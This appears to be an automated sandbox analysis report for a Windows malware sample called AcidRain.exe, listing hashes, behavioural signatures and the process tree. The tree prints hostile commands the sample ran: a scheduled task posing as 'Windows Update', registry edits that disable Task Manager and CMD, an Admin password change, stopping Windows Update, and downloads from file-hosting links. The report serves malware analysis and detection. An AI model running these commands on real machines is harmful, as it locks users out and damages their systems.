Analysis

  • max time kernel
    307s
  • max time network
    337s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2022 14:13

General

  • Target

    TrashMalwares-main/AcidRain.exe

  • Size

    401KB

  • MD5

    ca7d220a719d83aa0dd379dd2c31037a

  • SHA1

    88518880ee68f2b108a99449da73ec92b5e3658a

  • SHA256

    fa9189d2c7408a9f3bcb0af1be7f00ba71af5014a8bca0986eb11a891fa6c8b5

  • SHA512

    eee05cd53f4f5edf6c6929a294284473c39b8193b211a3165333ed65c38ea4e9d5cc6a8e1a1ae2bb38652e83bc7d2ad20fa6d38f8cdbf3a94a7a10fb6358af78

  • SSDEEP

    12288:aToPWBv/cpGrU3yy/paSymdM3Gi3AryjBi:aTbBv5rUVRdM2iwejBi

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 6 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 11 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops autorun.inf file 1 TTPs 1 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 10 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe
    "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4480
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\Acid Rain.bat" "
        3⤵
        • Drops file in Drivers directory
        • Checks computer location settings
        • Drops startup file
        • Drops autorun.inf file
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:672
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0
          4⤵
          • Adds Run key to start application
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:616
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
            5⤵
              PID:4348
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
              5⤵
                PID:4536
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4724
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
                5⤵
                  PID:1788
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
                  5⤵
                    PID:4996
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1
                    5⤵
                      PID:2636
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5288 /prefetch:8
                      5⤵
                        PID:3816
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
                        5⤵
                          PID:4160
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
                          5⤵
                            PID:4760
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5560 /prefetch:8
                            5⤵
                              PID:3956
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
                              5⤵
                                PID:3048
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                5⤵
                                  PID:1904
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x200,0x22c,0x7ff66b545460,0x7ff66b545470,0x7ff66b545480
                                    6⤵
                                      PID:1428
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
                                    5⤵
                                      PID:3968
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
                                      5⤵
                                        PID:3972
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:8
                                        5⤵
                                          PID:1116
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3396 /prefetch:8
                                          5⤵
                                            PID:4060
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
                                            5⤵
                                              PID:652
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
                                              5⤵
                                                PID:2496
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1864 /prefetch:2
                                                5⤵
                                                  PID:5024
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:1
                                                  5⤵
                                                    PID:4560
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
                                                    5⤵
                                                      PID:3432
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
                                                      5⤵
                                                        PID:100
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=192 /prefetch:8
                                                        5⤵
                                                          PID:3648
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
                                                          5⤵
                                                            PID:4692
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
                                                            5⤵
                                                              PID:3404
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
                                                              5⤵
                                                                PID:3172
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
                                                                5⤵
                                                                  PID:3704
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1
                                                                  5⤵
                                                                    PID:5180
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
                                                                    5⤵
                                                                      PID:5436
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8008 /prefetch:1
                                                                      5⤵
                                                                        PID:5460
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
                                                                        5⤵
                                                                          PID:5612
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8540 /prefetch:8
                                                                          5⤵
                                                                            PID:5896
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:8
                                                                            5⤵
                                                                              PID:6044
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4112 /prefetch:8
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5124
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,10209069792808359118,12367320517447731982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1340 /prefetch:8
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4992
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                            4⤵
                                                                            • Modifies registry key
                                                                            PID:3620
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            Timeout 1
                                                                            4⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3836
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:772
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
                                                                              5⤵
                                                                                PID:1392
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              Timeout 1
                                                                              4⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4504
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              net stop wuauserv
                                                                              4⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1512
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 stop wuauserv
                                                                                5⤵
                                                                                  PID:2756
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                Timeout 1
                                                                                4⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:3172
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
                                                                                4⤵
                                                                                • Modifies registry key
                                                                                PID:1548
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                Timeout 50
                                                                                4⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:3560
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs"
                                                                                4⤵
                                                                                  PID:1324
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/ZXMSRSgb#CZCknCulyrMI41JcV-HN4mth37dIfpkEw6156NbD410
                                                                                  4⤵
                                                                                    PID:4936
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                      5⤵
                                                                                        PID:1820
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      Timeout 65
                                                                                      4⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:3500
                                                                                    • C:\Windows\SysWOW64\mspaint.exe
                                                                                      mspaint
                                                                                      4⤵
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2040
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+virus
                                                                                      4⤵
                                                                                        PID:1576
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                          5⤵
                                                                                            PID:1684
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+speed+up+your+computer
                                                                                          4⤵
                                                                                            PID:4500
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
                                                                                              5⤵
                                                                                                PID:3624
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              Timeout 5
                                                                                              4⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:224
                                                                                            • C:\Windows\SysWOW64\mspaint.exe
                                                                                              mspaint
                                                                                              4⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1108
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=FBI+OPEN+UP
                                                                                              4⤵
                                                                                                PID:3084
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffde04846f8,0x7ffde0484708,0x7ffde0484718
